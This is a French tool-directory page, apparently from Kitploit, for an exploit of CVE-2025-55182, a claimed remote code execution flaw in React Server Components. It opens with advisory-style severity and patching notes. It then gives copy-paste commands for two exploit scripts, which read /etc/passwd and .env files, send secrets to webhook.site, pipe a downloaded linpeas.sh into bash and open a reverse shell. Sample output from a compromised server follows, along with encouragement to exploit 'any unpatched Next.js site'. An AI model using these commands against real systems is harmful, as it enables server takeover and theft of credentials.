Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Blackash-CVE-2025-55182 — CVE-2025-55182 | Kitploit
Outils/GitHubGitHub/shen771/blackash-cve-2025-55182
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed TeamingOutil d'Accès à Distance
GitHubshen771/blackash-cve-2025-55182
303il y a 9 moisPas encore vérifié

Blackash-CVE-2025-55182

CVE-2025-55182

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2025-55182 — Vulnérabilité critique du serveur React

6930a0395ea4b5bfdd70430a_CVE-2025-55182

🧠 Ce que c'est

  • ⚛️ Une faille de sécurité critique dans React Server Components (RSC)
  • 🧨 Causée par une désérialisation non sécurisée
  • 🌐 Exploitable via des requêtes réseau
  • 🔓 Aucune authentification requise
  • ☠️ Peut conduire à une exécution de code à distance (RCE)

✅ Cela signifie que des attaquants pourraient potentiellement exécuter du code serveur arbitraire avec une seule requête spécialement conçue.


📊 Sévérité

  • 🔴 Score CVSS : 10.0 (Critique)
  • 🏴‍☠️ Complexité d'attaque : Faible
  • 🔑 Privilèges requis : Aucun
  • 👤 Interaction utilisateur : Aucune
  • 💥 Impact : Compromission totale du système possible

📦 Technologies concernées

⚠️ Systèmes utilisant React Server Components, notamment :

  • ✅ Paquets React server DOM

  • ✅ Frameworks qui intègrent RSC, tels que :

Télécharger l’outil
  • Next.js (App Router + RSC)
  • Plugins Vite RSC
  • Outils Parcel RSC
  • Redwood, Waku, etc.
  • ❌ Non concernés :

    • Applications React pures côté client
    • Applications qui n'utilisent PAS les Server Components

    🔥 Pourquoi c'est dangereux

    • 🧑‍💻 Les attaquants peuvent exécuter des commandes sur votre serveur
    • 🗃️ Possibilité de voler des bases de données et des secrets
    • 🦠 Peut être utilisé pour déployer des rançongiciels ou des portes dérobées
    • 🔄 Peut permettre un déplacement latéral dans l'infrastructure
    • 🚀 Exploitable à grande échelle

    🛠️ Que faire immédiatement

    ✅ 1. Patcher et mettre à niveau

    • ⬆️ Mettez à jour React vers des versions corrigées
    • ⬆️ Mettez à jour Next.js ou tout framework basé sur RSC

    ✅ 2. Audit des dépendances

    • 🔍 Recherchez les paquets vulnérables transitifs

    • 🧾 Utilisez :

      • npm audit
      • pnpm audit
      • yarn audit

    ✅ 3. Protection temporaire (pas un correctif complet)

    • 🛡️ Règles WAF
    • 🔐 Filtres de validation des requêtes
    • 🚫 Bloquez les payloads suspects

    ⚠️ Ces mesures ne font que réduire le risque — elles ne remplacent PAS le correctif


    👥 Qui devrait s'inquiéter ?

    • ✅ Développeurs full-stack utilisant Next.js App Router

    • ✅ Équipes DevOps hébergeant des applications React SSR

    • ✅ Ingénieurs sécurité surveillant :

      • Services web Node.js
      • Runtimes Edge
      • Applications SSR serverless

    📌 Point clé à retenir

    🚨 Si votre application utilise React Server Components et n'est pas corrigée — elle est potentiellement entièrement compromise dès maintenant.


    🚨 Voici tous les one-liners rapides dont vous aurez jamais besoin (copier-coller → résultat instantané) :

    CVE-2025-55182.py (RCE basique)

    root@kitploit:~
    # Basic info
    ./CVE-2025-55182.py https://target.com "id"
    ./CVE-2025-55182.py https://target.com "whoami"
    ./CVE-2025-55182.py https://target.com "uname -a"
    
    # Read files
    ./CVE-2025-55182.py https://target.com "cat /etc/passwd"
    ./CVE-2025-55182.py https://target.com "cat /app/.env"
    
    # Exfiltrate
    ./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
    
    # Download & run (if wget/curl exists)
    ./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
    

    CVE-2025-55182-revshell.py (reverse shell instantané)

    root@kitploit:~
    # 1. Start listener (once)
    nc -lvnp 4444
    
    # 2. Fire → shell in <3 seconds
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    C'est littéralement tout.
    Deux scripts, ces 8 commandes → compromission totale de n'importe quel site Next.js non corrigé aujourd'hui.
    Allez chercher ces bounties.

    Voici exactement ce que vous verrez en temps réel lorsque l'exploit fonctionne (cible non corrigée à 100 %, 3 déc. 2025) :

    1. Lorsque vous exécutez le script RCE normal (CVE-2025-55182.py)
    Vous tapez :

    root@kitploit:~
    ./CVE-2025-55182.py https://target.com "whoami"
    

    Vous voyez instantanément à l'écran :

    root@kitploit:~
    [+] CVE-2025-55182 Exploit
    [+] Target  : https://target.com
    [+] Command : whoami
    [+] Sending payload ...
    [+] Payload delivered successfully!
    [+] HTTP 200 – Command should have executed on the server
    [+] Server response:
    node
    

    → Ce « node » (ou tout ce que la commande retourne) est la sortie réelle du serveur victime.
    Si vous exécutez id, vous verrez les lignes complètes uid/gid, etc.

    2. Lorsque vous exécutez le script reverse shell (CVE-2025-55182-revshell.py)
    Vous tapez :

    root@kitploit:~
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    Vous voyez instantanément sur votre terminal d'écoute :

    root@kitploit:~
    listening on [any] 4444 ...
    connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
    whoami
    node
    pwd
    /app
    ls -la
    total 1234
    drwxr-xr-x 1 node node  4096 Dec  3 12:34 .
    drwxr-xr-x 1 root root  4096 Nov 30 10:11 ..
    -rw-r--r-- 1 node node   420 Dec  3 11:11 .env
    ...
    

    → Shell TTY interactif complet en tant qu'utilisateur node (presque toujours l'utilisateur de l'application web). Vous contrôlez la machine.

    C'est littéralement tout.
    Si vous voyez l'un des éléments ci-dessus → l'exploit a fonctionné à 100 %.
    Si vous n'obtenez que HTTP 403/404 ou rien → déjà corrigé ou bloqué par le WAF.

    Bonne chasse.


    avertissement

    Ce PoC est destiné uniquement aux tests de sécurité autorisés et à un usage éducatif.
    Ne l'exécutez pas contre un système que vous ne possédez pas ou pour lequel vous ne disposez pas d'une autorisation écrite explicite de test.
    Toute utilisation non autorisée est illégale et peut entraîner des poursuites pénales.
    Utilisez-le uniquement sur votre laboratoire, des programmes de bug bounty avec un périmètre clair, ou des cibles qui vous ont donné la permission.

    Vous êtes 100 % responsable de vos actes.